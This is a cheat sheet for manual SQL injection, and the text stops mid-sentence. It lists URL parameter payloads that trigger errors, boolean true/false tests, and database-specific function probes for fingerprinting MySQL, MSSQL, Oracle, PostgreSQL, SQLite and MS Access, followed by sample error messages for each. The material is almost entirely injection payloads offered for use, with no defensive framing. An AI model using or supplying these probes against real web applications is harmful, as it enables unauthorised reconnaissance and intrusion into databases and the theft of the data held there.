💉Recognize DB to Manual SQL injection

How to Create Error

1. ?id=2' ----> Create Error

2. ?id=2" ----> Create Error

3. ?id=2'\ ----> Create Error

4. ?id=2"\ ----> Create Error

5. ?id=2'/ ----> Create Error

6. ?id=2"/ ----> Create Error

7. ?id=2%bf%5c' ----> Create Error

8. ?id=2%bf%5c" ----> Create Error

----------------------------------------------------------------

How to Use them

1. ?id=122' ----> Check Error

2. ?id=122" ----> Check Error

3. ?id=122 and 1=1 ----> Check True

4. ?id=122' and 1=0 ----> Check False

5. ?id=122 and {{Function_Payload}} ----> Check DB Function related to that Database One by One

For that we are going to use the functions related to that database into our injection if the output is normal then its working but if we get any error or the page output dont come as normal then we can understand that the function we are using do belongs to this db

----------------------------------------------------------------

To check if the current db is MySQL:

conv('a',16,2)=conv('a',16,2)
connection_id()=connection_id()
crc32('MySQL')=crc32('MySQL')

----------------------------------------------------------------

To check if the current db is MSSQL:

BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)
@@CONNECTIONS>0
@@CONNECTIONS=@@CONNECTIONS
@@CPU_BUSY=@@CPU_BUSY
USER_ID(1)=USER_ID(1)

----------------------------------------------------------------

To check if the current db is Oracle:

ROWNUM=ROWNUM
RAWTOHEX('AB')=RAWTOHEX('AB')
LNNVL(0=123)

----------------------------------------------------------------

To check if the current db is PostgreSQL:

5::int=5
5::integer=5
pg_client_encoding()=pg_client_encoding()
get_current_ts_config()=get_current_ts_config()
quote_literal(42.5)=quote_literal(42.5)
current_database()=current_database()

----------------------------------------------------------------

To check if the current db is SQLite:

sqlite_version()=sqlite_version()
last_insert_rowid()>1
last_insert_rowid()=last_insert_rowid()

----------------------------------------------------------------

To check if the current db is MSACCESS:

val(cvar(1))=1
IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0
cdbl(1)=cdbl(1)

----------------------------------------------------------------

Error may always not be real SQL error it may be some times generic error or change in output of the application.

All you have to do it recognise it DB.

MySQL Error Style:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

MSSQL ASPX Error:

Server Error in '/' Application

MSAccess (Apache PHP):

Fatal error: Uncaught exception 'com_exception' with message Source: Microsoft JET Database Engine

MSAccesss (IIS ASP):

Microsoft JET Database Engine error '80040e14'

Oracle Error:

ORA-00933: SQL command not properly ended

ODBC Error:

Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)

PostgreSQL Error:

PSQLException: ERROR: unterminated quoted string at or near "'" Position: 1orQuery failed: ERROR: syntax error at or near
"'" at character 56 in /www/site/test.php on line 121.

MS SQL Server: Error:

Microsoft SQL Native Client error %u201880040e14%u2019Unclosed quotation mark after the